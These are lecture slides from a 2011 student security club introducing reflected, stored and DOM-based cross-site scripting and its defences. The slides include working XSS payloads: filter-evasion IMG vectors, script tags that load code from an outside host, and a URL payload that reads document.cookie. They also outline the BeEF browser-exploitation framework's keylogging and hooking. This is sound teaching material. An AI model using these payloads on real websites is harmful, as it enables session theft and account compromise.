Introduction to XSS attacks!

Lecturer: MOUGEY Camille

SecurIMAG  

2011-­‐10-­‐06  

WARNING:  SecurIMAG  is  a  security  club  at  Ensimag.  Thoughts,  ideas  and  opinions  are  not  related  to  Ensimag.  The  authors  assume  no  liability  including  for  errors  and  omissions.  

¡¡_ (in)security we trust _!!!

Grenoble  INP  Ensimag  

Summary

•  Reflected & Persistent XSS •  Principle •  Counter-measure •  Tools Related

•  DOM based XSS/DOMXSS •  Principle •  Counter-measure

•  DOMBased vs. Standard XSS

SecurIMAG  -­‐  Introduc0on  to  XSS  atacks  -­‐  MOUGEY  Camille  -­‐  2011-­‐10-­‐06  

Intro

•  Cross Site Scripting (XSS) •  Malicious scripts injection

•  XSS != CSRF

•  Often under estimated

•  Easy to find, hard to defeat •  XSS on bank website, Facebook, Google, …

•  Constant evolution •  Need standard functions (PHP 5: filter_var())

SecurIMAG  -­‐  Introduc0on  to  XSS  atacks  -­‐  MOUGEY  Camille  -­‐  2011-­‐10-­‐06  

Reflected & Persistent XSS

•  Reflected & Persistent XSS •  Principle •  Counter-measure •  Tools Related

•  DOM based XSS/DOMXSS •  Principle •  Counter-measure

•  DOMBased vs. Standard XSS

SecurIMAG  -­‐  Introduc0on  to  XSS  atacks  -­‐  MOUGEY  Camille  -­‐  2011-­‐10-­‐06  

Reflected & Persistent XSS Explanation

•  Reflected

SecurIMAG  -­‐  Introduc0on  to  XSS  atacks  -­‐  MOUGEY  Camille  -­‐  2011-­‐10-­‐06  

Web based vulnerabilities XSS - Cross-Site scripting

Reflected XSS / type 1 attack

12

12[IBM 2002] Cross-site scriptingFabien Duchene, Karim Hossen (LIG) 5MMSSI-1-Common vulnerabilities and attacks 49/77 2011-2012 49 / 77

•  Demo

SecurIMAG  -­‐  Introduc0on  to  XSS  atacks  -­‐  MOUGEY  Camille  -­‐  2011-­‐10-­‐06  

Reflected  

Reflected & Persistent XSS Explanation

Persistent  

Reflected & Persistent XSS Counter-Measure

•  Seems, but easy to defeat •  In real life: if(preg_match("#<script#is", urldecode($input)) die("FAIL");

-­‐>  Safe  ?  

SecurIMAG  -­‐  Introduc0on  to  XSS  atacks  -­‐  MOUGEY  Camille  -­‐  2011-­‐10-­‐06  

<IMG SRC="jav ascript:alert('XSS');">

Browser  support:  [IE7.0|IE6.0|NS8.1-­‐IE]  [NS8.1-­‐G|FF2.0]  [O9.02]  

<IMG SRC="jav&#x09;ascript:alert('XSS');">

Browser  support:  [IE7.0|IE6.0|NS8.1-­‐IE]  [NS8.1-­‐G|FF2.0]  [O9.02]  

<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>

<SCRIPT SRC=//ha.ckers.org/.j>

Browser  support:  [IE7.0|IE6.0|NS8.1-­‐IE]  [NS8.1-­‐G|FF2.0]  [O9.02]    

Browser  support:  [IE7.0|IE6.0|NS8.1-­‐IE]  [NS8.1-­‐G|FF2.0]  [O9.02]    

Try  ‘< script’  (with  a  space)  

Reflected & Persistent XSS Counter-Measure

•  Testing for XSS (blackBox):

•  Identify Input

•  Analyse HTML Code

•  Testing for Stored XSS

•  Replay browser trames/request (from logs,…) with an instumented browser

SecurIMAG  -­‐  Introduc0on  to  XSS  atacks  -­‐  MOUGEY  Camille  -­‐  2011-­‐10-­‐06  

Reflected & Persistent XSS Counter-Measure

•  Client Side •  SOP •  NoScript

•  Bypass method

SecurIMAG  -­‐  Introduc0on  to  XSS  atacks  -­‐  MOUGEY  Camille  -­‐  2011-­‐10-­‐06  

NoScript's  default  an0-­‐xss  rules:  ^[url]h[p://[/url]([a-­‐z]+)\.google\.(?:[a-­‐z]{1,3}\.)?[a-­‐z]+/(?:search|custom|\1)\?  

Try  www.google.xss.com  …  

v  1.6.9.2  

v  1.6.9.8  Hold  CTRL,  and  NoScript  desapeared  ..  

Reflected & Persistent XSS Counter-Measure

•  Server side •  OWASP 8 Rules •  RULE #1 - HTML Escape Before Inserting Untrusted Data into HTML Element Content

•  In general, never trust client Input !

•  Have you thought about ‘User-Agent’, ‘Referer’, ‘Accept-Language’, ‘Cookies’, … ?

•  HTTPOnly cookie flag

SecurIMAG  -­‐  Introduc0on  to  XSS  atacks  -­‐  MOUGEY  Camille  -­‐  2011-­‐10-­‐06  

RULE  #1    &  -­‐-­‐>  &amp;    <  -­‐-­‐>  &lt;    >  -­‐-­‐>  &gt;    "  -­‐-­‐>  &quot;  

Reflected & Persistent XSS Tools related

•  Counter-Measure •  Input/Output sanitization: HTMLPurifier

•  Stored XSS Finder •  Scrubbr •  Some homemade script

•  Ajax worms

•  XSS Exploitation Framework •  BeEF

SecurIMAG  -­‐  Introduc0on  to  XSS  atacks  -­‐  MOUGEY  Camille  -­‐  2011-­‐10-­‐06  

BeEF

•  Architecture

SecurIMAG  -­‐  Introduc0on  to  XSS  atacks  -­‐  MOUGEY  Camille  -­‐  2011-­‐10-­‐06  

BeEF

•  Launch

•  Hook

•  And you get:

SecurIMAG  -­‐  Introduc0on  to  XSS  atacks  -­‐  MOUGEY  Camille  -­‐  2011-­‐10-­‐06  

BeEF

SecurIMAG  -­‐  Introduc0on  to  XSS  atacks  -­‐  MOUGEY  Camille  -­‐  2011-­‐10-­‐06  

•  BeEF Notable feature •  Browser exploitation modules •  Keystroke logging •  Browser proxying •  Integration with Metasploit via XML-RPC •  Plugin detection •  Intranet service exploitation •  Tor detection •  Browser functionality detection modules

•  Demo !

DOM based XSS/DOMXSS

•  Reflected & Persistent XSS •  Principle •  Counter-measure •  Tools Related

•  DOM based XSS/DOMXSS •  Principle •  Counter-measure

•  DOMBased vs. Standard XSS

SecurIMAG  -­‐  Introduc0on  to  XSS  atacks  -­‐  MOUGEY  Camille  -­‐  2011-­‐10-­‐06  

DOM Based XSS/DOMXSS/type-0 XSS

•  DOM (Document Object Model)?

SecurIMAG  -­‐  Introduc0on  to  XSS  atacks  -­‐  MOUGEY  Camille  -­‐  2011-­‐10-­‐06  

<P>                    

Content            

This  is  a  

<B>      

paragraph  

<P ALIGN="right">This is a <B>paragraph</B></P>

Align            

right  

DOM Based XSS/DOMXSS/type-0 XSS

•  DOM Based XSS principle •  Main idea •  The web-server does not receive the payload

anymore ! •  Detection are usually focus on the server output

SecurIMAG  -­‐  Introduc0on  to  XSS  atacks  -­‐  MOUGEY  Camille  -­‐  2011-­‐10-­‐06  

1  

2  

3  4  

DOMBased Example

•  Classic example: <HTML> <TITLE>Welcome!</TITLE> Hi <SCRIPT> var pos=document.URL.indexOf("name=")+5; document.write(document.URL.substring(pos,document.URL.length)); </SCRIPT> <BR> Welcome to our system … </HTML>

•  Normal use: http://www.vulnerable.site/welcome.html?name=Fabien

•  What about : http://www.vulnerable.site/welcome.html?name=<script>alert(document.cookie)</script>

•  The server see the payload ? Use # •  http://www.vulnerable.site/welcome.html?

foobar=name=<script>alert(document.cookie)<script>&name=Fabien

SecurIMAG  -­‐  Introduc0on  to  XSS  atacks  -­‐  MOUGEY  Camille  -­‐  2011-­‐10-­‐06  

DOMBased Counter-Measure

•  Traditional methods •  HTML encoding output data at the server side •  Removing/encoding offending input data at the server

side •  Don’t work well on DOMBased !

•  3 main rules •  Avoid client side document sensitive actions, using

client side data. Prefer Dynamic pages ! •  Analyzing and hardening the client side (Javascript)

code •  Use a very strict IPS policy (avoid evasion technique

like double attribut) SecurIMAG  -­‐  Introduc0on  to  XSS  atacks  -­‐  MOUGEY  Camille  -­‐  2011-­‐10-­‐06  

DOMBased Counter-Measure Back to the Example

SecurIMAG  -­‐  Introduc0on  to  XSS  atacks  -­‐  MOUGEY  Camille  -­‐  2011-­‐10-­‐06  

<SCRIPT>   var pos=document.URL.indexOf("name=")+5;   var name=document.URL.substring(pos,document.URL.length);   if (name.match(/^[a-zA-Z0-9]$/))   {        document.write(name);   }   else   {         window.alert("Security error");   }   </SCRIPT>

DOMBased vs. Standard XSS

•  Reflected & Persistent XSS •  Principle •  Counter-measure •  Tools Related

•  DOM based XSS/DOMXSS •  Principle •  Counter-measure

•  DOMBased vs. Standard XSS

SecurIMAG  -­‐  Introduc0on  to  XSS  atacks  -­‐  MOUGEY  Camille  -­‐  2011-­‐10-­‐06  

DOMBased vs. Standard XSS

SecurIMAG  -­‐  Introduc0on  to  XSS  atacks  -­‐  MOUGEY  Camille  -­‐  2011-­‐10-­‐06  

Standard  XSS   DOM  Based  XSS  

Root  cause   Insecure  embedding  of  client  input  in  HTML  outbound  page  

Insecure  reference  and  use  (in  a  client  side  code)  of  DOM  objects  that  are  not  fully  controlled  by  

the  server  provided  page  

Page  nature   Dynamic  ONLY   Typically  sta0c(HTML)  

Vulnerability  DetecPon  

•  Manual  Fault  injec0on  •  Automa0c  Fault  Injec0on  •  Code  Review  (need  access  to  the  page  source)  

•  Manual  Fault  Injec0on  •  Code  Review  (can  be  done  

remotely!)  

AQack  DetecPon  

•  Web  server  logs  •  Online  a[ack  detec0on  tools  (IDS,  IPS,  web  

applica0on  firewalls)  

If  evasion  techniques  are  applicable  and  used  -­‐  no  server  

side  detec0on  is  possible  

Counter-­‐Measure  

•  Data  valida0on  at  the  server  side  •  A[ack  preven0on  u0li0es/tools  (IPS,  

applica0on  firewalls)  

•  Data  valida0on  at  the  client  side  (in  Javascript)  

•  Alterna0ve  server  side  logic  

Questions ?

SecurIMAG  -­‐  Introduc0on  to  XSS  atacks  -­‐  MOUGEY  Camille  -­‐  2011-­‐10-­‐06  

Source / Bibliography

•  Wikipedia: •  XSS •  DOM

•  Berckeley’s University: •  An Empirical Analysis of XSS Sanitization in Web

Application Frameworks •  MISC n°49 •  XSS Cheat Sheet :

•  http://ha.ckers.org/xss.html •  DOMXSS Wiki:

•  https://code.google.com/p/domxsswiki/wiki/Index •  DOM Based Cross Site Scripting or XSS of the Third Kind

•  http://www.webappsec.org/projects/articles/071105.shtml

SecurIMAG  -­‐  Introduc0on  to  XSS  atacks  -­‐  MOUGEY  Camille  -­‐  2011-­‐10-­‐06  

Source / Bibliography

•  OWASP: •  https://www.owasp.org/index.php/

XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet •  Testing_for_Reflected_Cross_site_scripting_(OWASP-DV-001) •  Testing_for_Stored_Cross_site_scripting_(OWASP-DV-002) •  Testing_for_DOM-based_Cross_site_scripting_(OWASP-DV-003) •  Scrubbr •  https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

•  BeEF: •  http://beefproject.com/

•  Ajax Worms: •  http://www.gnucitizen.org/blog/wormx/ •  http://en.wikipedia.org/wiki/Samy_(XSS)

•  Mario Heiderich (HIP2k11): •  http://heideri.ch

SecurIMAG  -­‐  Introduc0on  to  XSS  atacks  -­‐  MOUGEY  Camille  -­‐  2011-­‐10-­‐06